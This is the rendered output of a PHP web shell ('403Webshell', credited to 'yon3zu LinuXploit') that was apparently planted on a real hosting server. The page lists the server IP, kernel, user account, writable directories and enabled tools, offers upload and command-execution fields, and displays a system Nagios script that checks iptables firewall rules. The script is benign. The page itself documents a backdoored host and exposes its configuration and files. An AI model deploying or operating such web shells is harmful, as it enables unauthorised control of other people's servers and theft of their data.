403Webshell
Server IP : 198.38.94.67  /  Your IP : 216.73.217.74
Web Server : LiteSpeed
System : Linux d6054.dxb1.stableserver.net 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
User : azfilmst ( 1070)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/lib64/nagios/plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/lib64/nagios/plugins/vz7_check_a2_fw.sh
#!/bin/bash
#
# Firewall rules check for vz7 nodes
# Refactored to add logging - BFENG-551

LOGFILE="/var/log/check_fw.log"
TMPFILE=$(mktemp /tmp/check_fw.XXXXXX)

_LOG() {
  echo -e "$(date '+%Y-%m-%d %H:%M:%S')" >> "$LOGFILE"
  echo "$1" | tee -a "$LOGFILE"
}

/sbin/iptables -S | grep -wE 'INPUT|DROP|REJECT' >> "$TMPFILE"

IPT=$(cat "$TMPFILE")
IDRP=$(echo "$IPT" | grep -c 'INPUT DROP')
DRP=$(echo "$IPT" | grep -c DROP)
REJ=$(echo "$IPT" | grep -c REJECT)

if [ "$IDRP" -eq 0 ]; then
  _LOG "check_fw - Iptables firewall has no default DROP policy!"
  cat "$TMPFILE" >> "$LOGFILE"
  rm "$TMPFILE"
  exit 2
elif [ "$DRP" -eq 0 ] && [ "$REJ" -eq 0 ]; then
  _LOG "check_fw - Iptables firewall DROP/REJECT rules are missing!"
  cat "$TMPFILE" >> "$LOGFILE"
  rm "$TMPFILE"
  exit 2
fi

/sbin/iptables -nvL | grep 'Chain' | awk '{print $2}' > "$TMPFILE"
CHAINS=$(cat "$TMPFILE")

for CHAIN in $CHAINS; do
  if [ "$CHAIN" != "FORWARD" ] && [ "${CHAIN:0:6}" != "OUTPUT" ] && [ "${CHAIN:0:4}" != "LOG_" ] && [ "${CHAIN:0:5}" != "SOLUS" ] && [[ ! $CHAIN =~ "LIBVIRT" ]]; then
    CNT=$(expr "$(/sbin/iptables -S "$CHAIN" | wc -l)" '-' 1)
    if [ "$CNT" -eq 0 ]; then
      _LOG "check_fw - Iptables firewall rules are missing!"
      cat "$TMPFILE" >> "$LOGFILE"
      rm "$TMPFILE"
      exit 2
    else
      echo "check_fw - Iptables firewall is OK"
      rm "$TMPFILE"
      exit 0
    fi
  fi
done

Youez - 2016 - github.com/yon3zu
LinuXploit